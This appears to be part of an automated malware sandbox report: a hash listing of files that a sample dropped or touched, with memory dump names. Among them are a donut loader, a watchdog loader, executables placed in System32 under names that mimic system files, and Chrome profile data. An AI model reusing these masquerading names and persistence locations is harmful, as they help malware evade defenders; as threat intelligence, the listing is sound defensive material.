C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libmpc-2.dll

MD5 06bd9185c36cf58b25f3cb76eb8cca45
SHA1 aacb00411e2870f4e21b986bd73bd270f25b4468
SHA256 615088d6ae8eb77a6cfed97616a76a992843794f67a6d0e2a496dd1298a9b5ad
SHA512 a3c15d0482545091ca1de236987b12af3db4f81aadd65b306a5d04fd4dcd3f3d11759f9ea247dfeaa8e8675e038ba92cb16d1b549a8c4fc474a8acec900d5af0

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\resource.rc

MD5 e9d07ba45abb4d3f1f482348e6cdafac
SHA1 295bcaf099e1a170febabfb8683f35e15e397e40
SHA256 36a4522944c1c0c32984260806be793cff7b3640e42c83ace1a433b738358ae3
SHA512 5ad1ae87a7ae9ecf57d41dad8392ceb514f2d3ca90041ac5a5a90af7f61fa7a51b7eff5a6434f935bbef184bb5f4306b9ab192ed650bf065a58d1e921ae1593a

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libisl-10.dll

MD5 22ae27db2aa723df78bfb0082c8d655c
SHA1 13c22b295c23e838fded260d3dd68370f9fead17
SHA256 1d210067f31ba2d8135416c61805b22fb191add0ab2165e6da4ef549a8fab5fc
SHA512 04486ed3ce9dab682bf8307391c98c9e191805b777ba9bd490290b9a30bb53aecf8859a918ed6da0f11e52fdeec3012618a77d9895ea59edb847c33685add32c

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libiconv-2.dll

MD5 48e2735197d6dcdb9e770de6c9f6da6c
SHA1 2048bc4f47230541d4c41706ab63e2f2cdd0a178
SHA256 ba2285e9081fc62a7bf6f6bb3deaef88b43df5312d2aa2c5216ca061e0b3f462
SHA512 73a15c57cbfe79e69a1361833d667cdea0e12154c7ab79a31519eb507dc145e07bbae320aef62e69f94f4570bbbbfdcd15e345d491448ab54a06b3343455044f

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libgmp-3.dll

MD5 fe5c6a36e0a8829823ba55b9d6429521
SHA1 b0fcdefd0c045c8d5b2bb7e1a95cf6a0938c8b9b
SHA256 3bd2deaddc781222f78722e1b734a91da27b9f0e679238e624d83015506a2a54
SHA512 c1134a9e515db42ac062de0a79995a7d5cc44ad67461ba960ef3239c4ce467c10af4c3a5017c0ad75197b82f3f9df53bb975e5af01ef07430e6414d13252c39c

memory/5520-355-0x000000006FE80000-0x000000006FED7000-memory.dmp

memory/5520-354-0x0000000065600000-0x0000000065619000-memory.dmp

memory/5520-349-0x0000000000400000-0x0000000001149000-memory.dmp

memory/5548-357-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/5548-356-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/3324-360-0x0000000000400000-0x0000000000541000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

MD5 c818c5393fac46f31e3f1ef911c3cad6
SHA1 af2253dc02312238e408e7b90ac20a01dc2f89af
SHA256 cd3252f0595d422bd46b2a92f0ee545a20f28b68631cf90ef1da2187c815b758
SHA512 ccd4d815af7e93f0b514560bb819ed6a76c37b3746cf58b51e4e5b0cc595c26efcfe858bf38e5246c606d95b3f064a11838047354ffa706903d827a863b5fcc2

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\loader.bin

MD5 5d8a3a7ac31a381a7770bc194f265fb0
SHA1 1f919b1292cbc220ab6a60acffc4fc1522a60d22
SHA256 e4e33c78f278f80774ad78ccad7d7fb122a4be872037d63bbd720a565ed07864
SHA512 bd02987abf583d54e9755965f819c7aa28049273273e85bdf95a6c245e145643e9231ccd9c8a431ac7a3f3721250fcbd2aeba512353a48b97f0f0c7e458ff4b6

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

MD5 42a26c8e07f76a947f754ef038f79629
SHA1 2af051b936a5952bdb9939f980ac91afaf40c817
SHA256 a2d391c9543360a703b66b911151ecc151a17f71eec5a8a4b142715413832049
SHA512 9d89fd899f738e71cacf4ec11c73cbcc6c3cf8d52f9a85a3223fce00c4a4903c451c30e1b46f8f99230b4d8a8f8f9f0ff0b0f763d30eb895e9dc6e6362b9fecd

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\libtcc.dll

MD5 a369bcfb3b6876a1a866064ba9248af6
SHA1 e7cde3ee4e88bfa901f9ee8579bc20f5b1adfa73
SHA256 c32bf1788e6083d58d3b897efa5248bba9379674170f5d1562df457ca568fdfd
SHA512 43884b01189cef52b7bfb4c384af7c25ec4f9737d67a1b61a4d8f75933c552ca57f51f934287377f1ea6e8ac5fb4feec80fd34a5641b5a04317231a11b1ea05a

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\winapi\pshpack2.h

MD5 5f9ba2a3122f6963219bdd95eff0d63b
SHA1 fc7ef1dbf2d51d9e38e79bc4d2dfe7f89107263e
SHA256 d459cbd546929fd44980d32c1680a8f176d717ce9df162f5c5c443dfdccc9e42
SHA512 4339e932da337fc33cb8544fad3065f82f689e17ae9cfd6a3035a0a1c62271ed0efc44553a75c29207e97555e55ff8f76d42fbef57b46b0e117b087a367a5d1f

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\winapi\poppack.h

MD5 584ebd620b89c671805eb5917278c46f
SHA1 645dca8a4775e323eed290eb1262a898e3bd8df3
SHA256 81c951e1fb87aa8f6e8871a073277f1cd1ccb9b66f6efa92aff35bcd00a60726
SHA512 f80c37df443967189b8b3e246e860e854a65283b9e7dbbfd87fe30e6e8285c785df2d6f74ac9d7d59cdf655e543b830042a51574fedcf5611714946da2d1d542

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\winapi\pshpack4.h

MD5 9e2e16a461b193bae9e69c59c9a3e040
SHA1 17aaa9161d3f9d7270edb80bc850b3ad1cd9151a
SHA256 cd3ba1258a5dd9c714879d3e499b021c85ee9827c06bac2fc2c1e677b5909531
SHA512 37c580b406eb30fc66b0135d91d8dc743a9f2abbf830a58272ecf910e4f4bde10ed9a1cf07a8c0f24bfa2d8e86883af76c5a7805fc70a2ae69f1a9d8225774df

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\sec_api\string_s.h

MD5 544899f39ca616ae07d97a2fee8de3d4
SHA1 2f95831d27cc918e633e8d711087ccf7c3da918b
SHA256 eef32fb505b98a3610923e8ddb3de724c55b44389d25cef7cf50ee3cd14f5d68
SHA512 20dbf6c25ff2270402bb4eb99430b83128f66d577b7c9277cacbf8cdb5438ec58b6b1ea468499d1f48338cf4f2433a1a0e59e242f812b419c6afc637340c86ab

memory/3504-399-0x0000000062180000-0x00000000621DF000-memory.dmp

memory/3504-398-0x0000000000400000-0x0000000000410000-memory.dmp

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\string.h

MD5 7e3ac3220bf883da2db8cdc7b8100d0b
SHA1 666e6f91306ef6412ae912fa386b3decc6332ad5
SHA256 d5c02c22653784792eeff04cc453467ba22c214d9ace876127eab5fcccbca762
SHA512 1e27e9e73c5d3fbec7ce41cb3b5fd6615bacc416991321bce22b599150902352cf60078cd447bbbbd49f3106254c5e88e3fb01ca7de62da9a4dedb6fd60f9b7a

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\winapi\guiddef.h

MD5 d65fffb282c1f60ccbfc4dcf1410be1f
SHA1 2be8badb6c6fb0db0b023bfbc7b6842e0ab73a8f
SHA256 7db1b1fe46513f578a3c777c3ce300d8403d31fbfb6d00eacff93286d2ed1293
SHA512 e7f9554980671dcb14c62ff462ae34961c01e0dd1afa9f8e010370b0941e22ba619abea98dce090762888a1e485586baaa0917167ff6373c8309374ebce8054f

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\winapi\basetsd.h

MD5 4bf8483ca6a55237b88b3fb04917c9b4
SHA1 1d5a57a8af15ff88521335970f6c547eb2bda403
SHA256 5c9cbaa16abf57400ed31b49aab7ee015788dbe7d3b58f3d53c86db3807dd6f0
SHA512 7c4e012ef32a9529a0fa648320796d2abb287c3c37f22d2cfefe62fd0851cf68b5d373316ad70b51d09f0d0f1f48843a5d6e430c12367b5363648eeff1160466

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\ctype.h

MD5 22e5a00491e32d15b40b196397ad01c1
SHA1 b0db6fcbf4abd2f4fdea2771399c1e502d9f8106
SHA256 4cfaaa43b3f7414984126e8b1cdf65f9dac0ef68d9a3396be0b8828376a74a6b
SHA512 28839104776441738233334a20de6ce3ada51179fb50366c27ab60432949fc78e1ccf735d2e80216f8779d84328634005c322d0010875e8fe0ff33d699ecc114

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\winapi\winnt.h

MD5 67fb88877fbdeb629c2b760dfe1e77e1
SHA1 656b9a3667b073fb0f8c8c245b164dca29a7f96f
SHA256 d4d1a1d444d7b18cee12b875c1c983aa23ac5d6526dbf5534de4a3c9cf61abda
SHA512 301a3dfa2547ce8c93e713f4c0ce340ad74447a96a9da625774fddfcb4366ed900542111fc6dfdb781b9720d9751f2d6b766b90c4fb88fa0444b5786a4ca8830

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\winapi\windef.h

MD5 4149cf07a0fcb5fafab7f58bcc951d8c
SHA1 dbf6f1002b67da30ce63be5d41e0eaa76263ac9f
SHA256 137e9a43a136e4ae19b3a4c844023c6a1611b23685000364f6be3143db1a4c75
SHA512 1bc969d3700c3beb6416eed13942142315efee5f929c55f539e11fb9196c8865ca05be0a39094c6e7457b671ba33299d3861aec6161dd0429e8a375f378659a9

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\excpt.h

MD5 d236372cba09e14c37b4e48f81baef83
SHA1 11a3bffaacedfa1caa4b4bb836cd95297a4ecc6d
SHA256 0098e51602c94f8a9702f4b776d3630f56eec27ed67b9fc36d9204933b58ac4d
SHA512 d7c22525fbb97bf8950db69645511420f1198abe33f5d0fe07a5ee8dd6b5cda07038b6db71a2995c6f5ec1b85d8b98e4370330193132e95f2a65e3a847f04408

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\winapi\windows.h

MD5 3c6791cb204a9a3a24332adb2da36bef
SHA1 4c510346aceb0dc1577edf738f10e772c49cab17
SHA256 7b2bd9dda845c0c3bd8e26abefe09660ce23386bc2a378c185ebdc9dc508193c
SHA512 1f82707483f507a4fa6657485619c95d500f39745eaaea0f0180652092d7467d1874032f1d7cd124693b2424c533e2248db2a8c0a8b6400ebab5f9250b9d4370

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\malloc.h

MD5 537bc027e86f7252d88b6bf2fe5b2f35
SHA1 7f3361d220f96ad1b93669254937929f267cc333
SHA256 7307ff330b8d7954d548e19e45887ed64de36da5bee1fda2cc021f0c1c1892bd
SHA512 3d7693f46fe1272decba8efb6a01853786419055cf338cc900c9fe3ec1b795ba25e16878a5d53261bf3bc3bab7525110b6f1844501d5fb6be45c57b5d277f625

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\sec_api\stdlib_s.h

MD5 ae13bd6218c4840eacac71f31c45b2bc
SHA1 e05d796ce8f5aeaa629ca9f1e3f6d4ac154148a2
SHA256 8650e34be241c7d837433126878eb6a30ee71c0b759c23671fd8f0715c7cde65
SHA512 689808a64c20260f3091e94dce6eaabf8662ba627b4de4c43ed685390565186e69ff229cb4755e9d3bd12b5c46e16ccfd848652703572e790df7bbab3824ff9a

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\limits.h

MD5 5be6b04221366632fd3ea3110213676b
SHA1 5fc1f334ffe514780798f6178330f756bfcf9972
SHA256 395d8bf72ed91b83d512234089ae8a96d8a21e72f5fdcbd56af4aef6e1110c62
SHA512 1326d02376573e3bcdc9567c00d443d56b4f72b07452bf96f508f0f3a49c5e09c73e643b961aa5e47c212517002f8dabfd34afbb840cc09eafba1f6cb8edb7df

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\stdlib.h

MD5 13f9d6f0f5fa1994d0a164a2ce8d3145
SHA1 5869abf7724e980d0acc9760776cac2d9e5d1686
SHA256 44a1655e92cb9aa0154023e55ca570cfe410e0db024bbb0b784cbad61a3e5d64
SHA512 f0f3664fc54b1af161d9f3d19dbd8fce87de29ebb0bad503e316dc25ca44a2fd1b2024ce73b305de78c24a0ffdc9a899d82d0bc5eb0905d913c8adb24304126a

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\sec_api\stdio_s.h

MD5 3c28755c2186dabae016938e1308b77f
SHA1 9437b43cd64ed70638df695b1b9eab34c1b04f57
SHA256 5107bed740c6274ffc767ad42ded6ce5a8f51cb0c73239d04d5a647d62edf2f1
SHA512 9d89fe5e5b8396998a552e443970f45c8e9f2f04f180d14f1cbbdc56a1fd5ae0f2c9f81b8e25d0dcb20fb1437d9bd178a6dad68a323aa0e9eaef31b6b6d40f33

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\vadefs.h

MD5 dda4463da15121ed7ad4f091fbf61dff
SHA1 84b4c4973306ef725c3f61446ab891cac6aa66a4
SHA256 2e6ab359559319a11a80f8f52aa0472cd0b141137f3a1eaa18c40d8827dc51d4
SHA512 d3417cf7702a17f0f327cbaf8d167d7830a2955c19d553893329696cdf2312707595cf0f6ddaa36ea18d0cea41f24e6fa9c15ac14d5bc567bc25a1cc81b733fe

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\stdarg.h

MD5 7b52fb5e54fdff4c741f5180844cb24a
SHA1 b2d080a82d0d365cf563c685da15f6094e004054
SHA256 a38f8d34f5e09658cc3a8892b3a7e80ff566eaeedc194e5a85ece0b675993137
SHA512 db442c6d0778e97fd00ca42804bd668dcb00db10418af54106c7302a140cd47973ab3859d119ae8e2413fbba0ea233c60d05d786a84f27e539247f98e16dcfc6

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\stddef.h

MD5 6bc4a5a0894639efd36ab6d597b70419
SHA1 5f66229dd24c366c3ed079b2cf410c4346283ce9
SHA256 af03437868a4f8a60da48bec4cabf42a85bfa2be67839bc91dd0f99fede7f907
SHA512 45ce26c12c5ddd01a6a58baf91b78dfb19fa89a59ae686da4183bf68a06ddbeac63b01e1d4de668ee9e17598b51a9205a17ae457567ee2688dd2fdb1c279ee7e

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\_mingw.h

MD5 3b4e52eaf66a0434ef4bd79587b95243
SHA1 c0c21c145420487f4925e8b8f05e4eb5cae63fc0
SHA256 f574410ada4c9ae430b17af722102f6b9dc749d7ec8dfe45427e51e269abe034
SHA512 333b50e44756a6763ebab63719aa2f22332301fb4ddb8b992d10b0685878765eb22e5e56c540ca4ff1d3cd79e7cb7bd119845ca97ca13a270ac3c24d401220e7

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\stdio.h

MD5 f4948adea7d9f60748de8b427ab85684
SHA1 101ad5424e182236eb7f537f17ce846c917ced27
SHA256 749059834143bcd5bdcea13fc863c8b6587a89d6dfc84cd5017a98df190defbd
SHA512 49847ca1a78bc100739b3afc8a0d607ac37e340cebbb0c04b2c067cdbdd6ed33ac5557214282699a89e39f4b8bb3a8b6383fc0a25c19265089e09b08765ea693

\??\c:\users\admin\appdata\local\temp\7zo454c4998\compilers\tinycc\include\tccdefs.h

MD5 b6b2dcd5bbc4337e2706c1c85acc23ff
SHA1 4bce6f082407dd411572bc0c9bb283f20d637d1f
SHA256 91a313663ec43ad7a74e34e399cd8a7310a7c906fab016bfef67759d9506dd4f
SHA512 da8a86a7ad640a95154c85b326a7b6f9a10139b38565c41686c14c9e9e30713fc67c036ca856f2258a91eb0e881db4e057e7bbc602f032be0ea0f37e88ebb49a

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-watchdog-loader.c

MD5 e295103051d69789cb287f20fdd01466
SHA1 15353e66f40b71fb4cef515ef6acf258e611d29b
SHA256 6b3352810d61683ca879ce8605df2e39a625b35abb488c224b87c801a2f1f4e1
SHA512 d253bdb8c0d6bac33601029564179a449d80e60d3c05e91a2f57b33b2447ad8d57f1f6d11c5a64c03d69f16ca5e1c5b0d31cc36dacb1f0c9c26b3c32a075fb44

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-watchdog.exe

MD5 acde52e33c24756b293648c9abb97c29
SHA1 6e5ad7910fc62ebf3170af88a2427f40908be4b1
SHA256 bab5626e6fe3d0d1c4780cdad85af555bd9c6a2fabe54e5314dba80a9ee38e59
SHA512 e50032be2d0e96bd08824ebee268e853e939d585525a412ce9dbe49a1860492f7982fe31e0f992abb1d409d14c0b64e840d6ef2741e1c95a59bba56d9fac312b

memory/5520-352-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/5520-353-0x000000006A780000-0x000000006A86A000-memory.dmp

memory/5520-351-0x0000000068C80000-0x0000000068CEF000-memory.dmp

memory/5520-350-0x0000000070F00000-0x0000000070F24000-memory.dmp

memory/2192-424-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/2192-427-0x000000006FE80000-0x000000006FED7000-memory.dmp

memory/2192-426-0x0000000065600000-0x0000000065619000-memory.dmp

memory/4676-436-0x0000000062180000-0x00000000621DF000-memory.dmp

memory/4708-443-0x000000006A780000-0x000000006A86A000-memory.dmp

memory/4976-449-0x0000000000400000-0x0000000000541000-memory.dmp

memory/5936-447-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/5936-446-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/4708-439-0x0000000000400000-0x0000000001149000-memory.dmp

memory/4708-445-0x000000006FE80000-0x000000006FED7000-memory.dmp

memory/4708-444-0x0000000065600000-0x0000000065619000-memory.dmp

memory/4708-442-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/4708-441-0x0000000068C80000-0x0000000068CEF000-memory.dmp

memory/4708-440-0x0000000070F00000-0x0000000070F24000-memory.dmp

memory/4676-435-0x0000000000400000-0x0000000000410000-memory.dmp

memory/4404-431-0x0000000000400000-0x0000000000541000-memory.dmp

memory/6040-429-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/6040-428-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/2192-425-0x000000006A780000-0x000000006A86A000-memory.dmp

memory/2192-421-0x0000000000400000-0x0000000001149000-memory.dmp

memory/2192-423-0x0000000068C80000-0x0000000068CEF000-memory.dmp

memory/2192-422-0x0000000070F00000-0x0000000070F24000-memory.dmp

memory/3788-453-0x0000000000400000-0x0000000000410000-memory.dmp

memory/3788-454-0x0000000062180000-0x00000000621DF000-memory.dmp

memory/2180-728-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/2180-732-0x000000006A780000-0x000000006A86A000-memory.dmp

memory/2180-726-0x0000000000400000-0x0000000001149000-memory.dmp

memory/6128-734-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/4500-736-0x0000000000400000-0x0000000000541000-memory.dmp

memory/6128-733-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/2180-731-0x000000006FE80000-0x000000006FED7000-memory.dmp

memory/2180-730-0x0000000065600000-0x0000000065619000-memory.dmp

memory/2180-729-0x0000000068C80000-0x0000000068CEF000-memory.dmp

memory/2180-727-0x0000000070F00000-0x0000000070F24000-memory.dmp

memory/2488-743-0x0000000062180000-0x00000000621DF000-memory.dmp

memory/2488-742-0x0000000000400000-0x0000000000410000-memory.dmp

memory/3768-754-0x0000000000350000-0x0000000000542000-memory.dmp

memory/428-763-0x000001F3AC7E0000-0x000001F3AC802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o34u0z1n.si3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

MD5 408d80ecf1504587eccd527e4d705db5
SHA1 e84fa23926039cddf99696bd91686f23c05171d5
SHA256 88ffb1b242b38bdd9ab7fc40cd123cb81b3d9efbbd2984415b313eacb6318ab2
SHA512 b8abfa0f4f49af86b385751028721ecc35f728669a501c8939b68bb310354cb3ed4408e18b8bf897fa2687aee66a5ac9be517d6632ffc340cee6e70f086a55e6

memory/5220-818-0x0000019F5FF50000-0x0000019F5FF56000-memory.dmp

memory/5220-819-0x0000019F61AD0000-0x0000019F61AD6000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\c5700a87-bf8a-4889-a032-24779ded4bfa.down_data

MD5 5683c0028832cae4ef93ca39c8ac5029
SHA1 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512 aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

memory/1516-845-0x000000006FE80000-0x000000006FED7000-memory.dmp

memory/1516-846-0x0000000065600000-0x0000000065619000-memory.dmp

memory/1516-840-0x0000000000400000-0x0000000001149000-memory.dmp

memory/6084-848-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/3220-850-0x0000000000400000-0x0000000000541000-memory.dmp

C:\Users\Admin\Downloads\resource.o

MD5 bba6cbe5f62a55960cae588e02b68676
SHA1 08c5c1e7cd0186e8f9f72a3e8fb9f5fd982f07a5
SHA256 d9aeabfd70a3b6ad687f37053723c5807cec46acf68587b8db449f1c44929c9f
SHA512 6d0db440a4ee7d83ca25c0b3d97de64cb0dc38707ffd281e3c7c0fc43b2e5dde42852dd8b07430330a71139a6460422c544c2d8ea7a4acaa64c8d6bcad351161

memory/6084-847-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/1516-844-0x000000006A780000-0x000000006A86A000-memory.dmp

memory/1516-843-0x0000000066200000-0x00000000662EB000-memory.dmp

memory/1516-842-0x0000000068C80000-0x0000000068CEF000-memory.dmp

memory/1516-841-0x0000000070F00000-0x0000000070F24000-memory.dmp

memory/648-854-0x0000000000400000-0x0000000000410000-memory.dmp

memory/648-855-0x0000000062180000-0x00000000621DF000-memory.dmp

memory/5816-860-0x0000000068C80000-0x0000000068CEF000-memory.dmp

memory/5816-859-0x0000000070F00000-0x0000000070F24000-memory.dmp

memory/1040-875-0x00007FFF591D0000-0x00007FFF59C92000-memory.dmp

memory/5568-877-0x000001FD7D3B0000-0x000001FD7D5A2000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 4aa3f9424a41efe4f537727cd36ec86c
SHA1 14d9b635851732a1e12eb0c30c5d2646c877404e
SHA256 7eef6403d8f2f731a91dff7e98188c017dee405915915a419808177f89a69e2b
SHA512 8b9c54074a69b26cd07b6c6d1a0efe432a862bc1f5eb9a8c893f16681505cb7d96bebbb4b9bc89d920ec80dc6e20ef60d343a2fcb850196908cbae333e40a4eb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 76c6a7bb3de2cbf45eab09d91a2d4e80
SHA1 0c170c723b2d335b1cf712918619a981cfc5d505
SHA256 b0a38e586fe3098ae1d23d0bf50356a3c8997ed5465df3c746c9979d0a21e1f9
SHA512 283a62dd95b97da03cdbc12448f2015c135ff38d5d4f1bd9b213664d5c55454164d66aaad9852edd37c0482566b32d5f81bbcf611183c1a932420c91438d474e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 b75e8641a83a2d422b5bd99961cb193b
SHA1 0dd6994c22befe7b50244e11f5aae81249e96424
SHA256 61d0681e4629e6a3edb51209961d64f0bcde9c802d887ac5c88c4143f4fc8d9e
SHA512 80bc2e8794bb4b522e89c9a78859ff38236efe8102b097d5c02cd0c06fea0817a8d9588b10e6168b477aa57f641cb9591f388f41edccad09a58a8eec844cc063

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0ce68a3731ce50f8a6475d78044c37bc
SHA1 940839312ae72dbcf8e3b93bac2b504355719909
SHA256 c5d2597e50f34dfcbbf8ee855a94275d84df870b015437ff9c4943ac5b13a380
SHA512 b0d9f510e38c2a993b9ae90d7925bef2550972c6c0536a756a4926631269779bdaecffc27e92c331878d9251331185d774cd8116d30c649c1c0fbff1ca422e4f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 d969e0d30dc0928c903d1a5a3c78bb59
SHA1 50bbedf202f5c93c4d63bd1f7220520f63b081ba
SHA256 cde39b3ce948361d1f9b822fa9d45443c6e9d2740beb03ee533e3a9b3b03135f
SHA512 4eabdde189ebf37e6ef2d9baf01039f2dbe4230971201ed295e7e4c8c912d6f728e60cae667310c52ed03ccce854cde6dfb8ae6476b93376e006394b2d92d5ab

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

MD5 e588001fc110b1f0013b4461ab85fe32
SHA1 5f8fefec25582c0c6bbaccc08e0abe83a80aa861
SHA256 e0bd63c49d802f971634f2594365142a1d3dace13f9b2028c61708658215b9fe
SHA512 6718a6828d0e108c35042fcb7f33e072d2130fb0fba78c1f295831baf7fe79bc01c7c609637ef6a00934be43f698f44a4f050cf3dcd00d16388db0e117a3e48c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe609629.TMP

MD5 07f7c7e60e49f0cb0edb1426ca2a7635
SHA1 a5c834ec4db28db1afd7b606ec004296ad8edb28
SHA256 4299750e7bbbb6070639d109cbafb25a9f03c83680e669401ace46b8170b0f19
SHA512 4762c11d7037931dfddb88fce238bcc0cc9aacf493feb96ecfc83722d631b7a12e75a0889f0c86cf0554cff99ab0bd831b7a65c1fea7dfdaf6938b26f64f0b39

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 424129d8626b167fc2543f9bb83f4323
SHA1 b36d6a977b5f2b7dc84aee4f58ddcf725fe7984d
SHA256 535a928fbc1eb134a642c711ef048eba84cfa48c5909d3ff42584f4f297ae5c4
SHA512 2c869e5d3eb4ef61db40ca2aa3b01aa8eba4337c5c8938a18d2c318d290364d56ec9f004cae90d2f7346775fd298ea391917c76d49ed31cc64186147da318e25

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e5a9ca86c205db0274c40f78502f2c4d
SHA1 c31d1dcc3e0a14a36d53e72e863363aa40bcdb28
SHA256 84cb95506e35d6f7408a433b8dbb4843b9bb33601fabc16705935542df8be9b9
SHA512 58a090de6b55429806d2722db8978f14ea9f24d8517074e0f2e795ebbbfb5766736f112bff1e92f3331cc3f38008189add8e3cb2a681ffc0ef4f61354591a3e2

C:\Windows\System32\services32.exe

MD5 e8358791829990de6bb31177b1901dba
SHA1 dc3db56fa93de2e59182ff4ba933101a0aa4eb4d
SHA256 06b6187cd56a4343f80ca91560ea49d4bb463e675d7af7c1bf88b6eedda651f5
SHA512 ad2b14da1f2ccfd46749ce3aeb2baf27a7262bf27fa922bec26efe15fa58ba501bac5ac6e99fecaf5ad06117e4c4661a6bab301e9f95ac24257e73193d535975

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 5190d1290aa075b82bf1a972a2da21c1
SHA1 647ff8b53ce9129556f2774632be4b3638ba517d
SHA256 a579ef5935f7a75f6a3150a7d4f5f9dfeaa865bb235d72ad5375af2d35c3930b
SHA512 d4910d55eba12470b2d0288d0608723e915e648c869b0746a442c94ca1b173c60038dde3f31de9b736d1be138018e360fdfb77bbf948d5d24aed59600c622fb9

memory/3028-1234-0x000002B574180000-0x000002B574372000-memory.dmp

memory/3952-1274-0x000002057BCD0000-0x000002057BEC2000-memory.dmp

C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

MD5 18b52011b4ff5be30ac8ff49b6d25678
SHA1 ba78a60cf67d63e183c3b022dab80bcf1b3509be
SHA256 6af15b2ca3e5ed57c99e758c1b8528bff0f894b722860ce2a99581fe1b8ebe17
SHA512 fb11ea31af30929a0c8d1db56e39a98ca57a5950aa356a805930d43aeb959e0f6df7572e320efcbf179983dc20547ac38e89e752ce6c63ba14070b9d9bebd101

memory/1760-1345-0x0000025AFB690000-0x0000025AFB696000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 087612773d5df324f4fff7d35142be49
SHA1 2a81706d1e9f0a17959db2823d1ef88adebf6f4c
